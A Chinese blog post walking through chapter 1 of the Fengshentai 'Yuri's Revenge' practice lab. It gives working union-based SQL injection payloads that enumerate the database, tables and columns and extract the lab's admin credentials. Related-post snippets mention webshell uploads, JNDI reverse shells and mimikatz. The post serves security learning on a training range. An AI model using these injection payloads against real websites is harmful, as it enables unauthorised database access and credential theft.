封神台尤里的复仇Ⅰ 小芳 第一章

最新推荐文章于 2024-06-15 20:21:51 发布
最新推荐文章于 2024-06-15 20:21:51 发布
阅读量167 收藏 4
点赞数 6
分类专栏: 封神台靶场合集 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shierbai/article/details/138750356
版权

也是刚过完白嫖课程,来试试靶场,经过群友的推荐,来做封神台的靶场学习一下。

话不多说,上图

首先第一章是个sql注入,没有任何waf之类的,首先点击查看新闻

?id=1 and 1=1

?id=1 and 1=2

可以看到很明显的注入点,语句测试类型,可以看到1=2的情况是没有返回内容的,基本可以确定是数字型的

那么接下来就尝试order by语句

?id=1 order by 2

by 3的时候报错,那么就是2个字段,再判断回显位置

?id=1111 union select 1,2

这里起初没看到图片花边下面的数字,还觉得奇怪,在用盲注,结果是我自己视力问题,言归正传,这里需要注意前面的id需要是一个不存在的值,否则不会回显我们想看到的回显数字2

找到回显位置后,利用联合查询依次数据库,表名,列名等

?id=1111 union select 1,database()

?id=1111 union select 1,group_concat(table_name) from information_schema.tables where table_schema='maoshe'

?id=1111 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'

?id=1111 union select 1,group_concat(username,id,password) from admin

管理员密码是hellohack,后面那个一眼广告

提交即可

shierbai
关注
  • 6
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
神台尤里复仇Ⅰ 小 第五章
shierbai的博客
05-12 295
那么就只能再上传一个已经组装好的wscript.shell,也就是下图的iis6.exe。自己在d盘上传一个cmd.exe,这里最好是用菜刀连接,且cmd.exe需要是win2003的,网上自行下载。netstat -ano看哪个端口对应的pid是2408,这里端口号是3389。这里直接有我直接下载后再上传到相同目录,关闭后再打开cmd.exe的虚拟终端。但我们可以看到我们只是一个普通用户,需要让自己变成一个管理员。我这里传在Inc下,用上传的cmd.exe打开虚拟终端。输就完了,会赢吗,包赢的啊。
神台尤里复仇Ⅰ 小 第九章
shierbai的博客
05-12 598
编译环境和攻击机的环境要一致,否则会一直无法反弹成功,我都使用jdk-8u201的,各位看自己情况。这里只介绍简单的一种方法,在进行前可以先用dnslog平台进行漏洞验证,此处不做赘述,然后构造payload往交互的地方,/*用户名密码都行*/一丢就完事。此关需要用vps,否则网站无法连接到我们,无法进行反弹连接。注意自己vps的架构,否则配置完也会报找不到路径。再起一个窗口开启监听,我这里用的xshell。这关对环境要求非常高!此处有数据交互,选取此处进行jndi注入。需要一致,否则不成功。
神台尤里复仇Ⅰ 小 第四章
shierbai的博客
05-12 490
用菜刀进行连接,需要注意,如果你使用的是蚁剑,那么你后续需要找一个很小的win2003的cmd.exe,仅此处不是很推荐用蚁剑。如题,然后找文件上传点,翻过来翻过去找到这里,这里建议选后面一点的产品进行上传,不然连接后续可能会被挤下去断开连接。这里需要注意如果后缀是.jpg,那么文件不被解析,cer是被解析的。这里可以看到做了白名单处理,就需要用IIS6文件解析漏洞去做绕过。生成成功后开启burpsuite进行抓包,点击上传。f12 ,存储,点击左侧cookie进行修改。然后保存修改结果,预览产品内容。
神台尤里复仇Ⅰ 小 第三章
shierbai的博客
05-12 151
alert(1)
神台尤里复仇Ⅰ 小 第二章
shierbai的博客
05-12 276
考虑报错注入,updatexml()被过滤,使用extractvalue()进行尝试发现并不出现报错回显,这里我想到了盲注,但盲注怪麻烦的,而且还不一定过滤了什么,有想法的可以拿sqlmap跑一下试试,于是我转换了一下思路,之前在sqli-labs里有做请求头部注入和cookie注入,此处对cookie没有做过滤,于是打开了burpsuite进行抓包。然后在cookie处修改(一定要用加号连接且from+admin也不能缺,这里是对表名做了猜测,否则仍然显示数据库出错)可以看到页面是有回显的。
神台尤里复仇Ⅰ 小 第七章
shierbai的博客
05-12 181
这里可以看到做了mime检测,直接抓包改content-type为image/jpeg就可以了。这里方法有好几种,这里我是用文件上传去做的,可能有疑问为什么不用扫目录啥的,这里露cms了按理可以直接搜索该cms的漏洞去直接做复现就行了。既然明确目标是文件上传,那么直接找上传点,如图。把那个图片拖出去复制url。
神台尤里复仇Ⅰ 小 第六章
shierbai的博客
05-12 126
直接右键文件属性,安全,高级,将拒绝更改为允许。还以为是welcome,果然不可能这么简单。这里可以看到是wow!直接在文件里面搜mimikatz。这里注意flag的wow不是大写。来到这个目录下,可劲挨着点。注意范围,不然可能搜不到。
神台——尤里复仇Ⅰ 小
ASD830的博客
03-21 363
我们可以查出“admin“”表里 有 “id” “username” “password” 三个字段。题目说让我们拿到管理员账户的密码,我们看一下username和password字段的内容。尤里正在追女神小,在得知小开了一家公司后,尤里通过whois查询发现了小公司网站。根据提示我们需要浅浅的sql注入一下,首先判断一下是否存在SQL注入漏洞。学过一点黑客技术的他,想在女神面前炫炫技。页面不正常,说明存在SQL注入漏洞。页面出现了2,说明我们的回显位为2。页面不正常,判断出字段数为2。
神台尤里复仇Ⅰ 小 第八章
shierbai的博客
05-12 123
看到有验证码,我最先考虑的是用插件进行验证码识别然后进行爆破,但此处大米cms存在验证码复用的漏洞,所以大家信息收集要做好。bp抓包,右键send to intruder。没扫出来,先进robots.txt看看。随便输点什么,验证码一定要输对。这关最简单了,丢工具完事。审题,因此做后台扫描。
尤里复仇WIN10全屏切换不黑屏补丁
07-29
把补丁放入游戏目录就可以了,网上一直没找到,提取的另外版本弄来的反复测试了很久找到的文件大家给个辛苦积分,红色警戒2尤里复仇V1.001版测试成功,时间2023-7-29
红色警戒尤里复仇魔改
01-16
内容丰富极小极大搜索算法 alpha-beta剪枝算法 课后习题 PPT 提高博弈程序效率 (PS:极大极小值算大应该是深度
YuriExtension:命令与征服尤里复仇的修复和扩展
06-10
它是什么? YuriExtension 是命令与征服 Yuri's Revenge 的修复和扩展,旨在在现代 Microsoft Windows 上运行。 目前可用的功能 使用 UDP 代替 IPX 能够在 Windows Vista 及更高版本上播放网络。...
易语言红警2尤里复仇修改器源码.rar
12-18
修改金币,建筑秒建,适于新手练习找基址和冷却地址
局域网对战玩红警红色警戒--尤里复仇.pdf
11-06
局域网对战玩红警红色警戒--尤里复仇.pdf
Flink Sql-用户自定义 Sources & Sinks
bigdatakenan的博客
06-13 894
在许多情况下,开发人员不需要从头开始创建新的连接器,而是希望稍微修改现有的连接器或 hook 到现有的 stack。在其他情况下,开发人员希望创建专门的连接器。本节对这两种用例都有帮助。它解释了表连接器的一般体系结构,从 API 中的纯粹声明到在集群上执行的运行时代码实心箭头展示了在转换过程中对象如何从一个阶段到下一个阶段转换为其他对象。
【AI+编程】工作日常场景随时可以AI编程,记一个问答SQL快速导出数据日常示例
最新发布
月晓风清
06-15 296
为了实现你需要的操作,即以问题名称作为表头,答案作为内容导出,你可以通过JOIN操作连接三个表,然后利用动态SQL语句进行行转列转换(PIVOT)。然后通过执行这个动态生成的SQL,你可以得到一个表格,表中的每一行表示一个成员,对应每个问题的答案作为列数据。然后,在动态生成的SQL语句中利用JOIN把db_member、db_question和db_answer连接起来,并根据question_id和member_id进行匹配,以输出每个成员对应的问题答案。下面是假定表结构,实际场景和它类似。
Python Flask 使用SQLAlchemy实现ORM管理
胖蔡叨叨叨
06-12 299
SQLAlchemy是python里提供的一款SQL工具,支持数据库连接、映射、对象关系映射(ORM)以及数据库操作等功能。SQLAlchemy在构建在WSGI规范上的下一代中得到了广泛应用。如下介绍如何在Flask项目中配合实现数据库管理。
SQL中distinct去重关键字的使用和count统计组合的使用
睡不醒的每天
06-13 453
distinct必须在列的前面,否则直接提示错误,当distinct作用于单列的的情况下,统计查询的结果为行数目的总数,包含null为空的数目。count(distinct 列名):根据指定的列统计记录总数,不包含重复的记录,不包括NULL或空的值。select distinct 列名1,列名2,列名3…select distinct 列名 from 表;也可以使用count(2)、count(3)等等。count(distinct 列名)
用C需要写一个冒泡排序
05-12
好的,以下是C语言实现冒泡排序的示例代码: ```c #include void bubble_sort(int arr[], int size) { int i, j, temp; for (i = 0; i ;...以上代码实现了冒泡排序,使用了两层循环,时间复杂度为O(n^2),不过冒泡...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值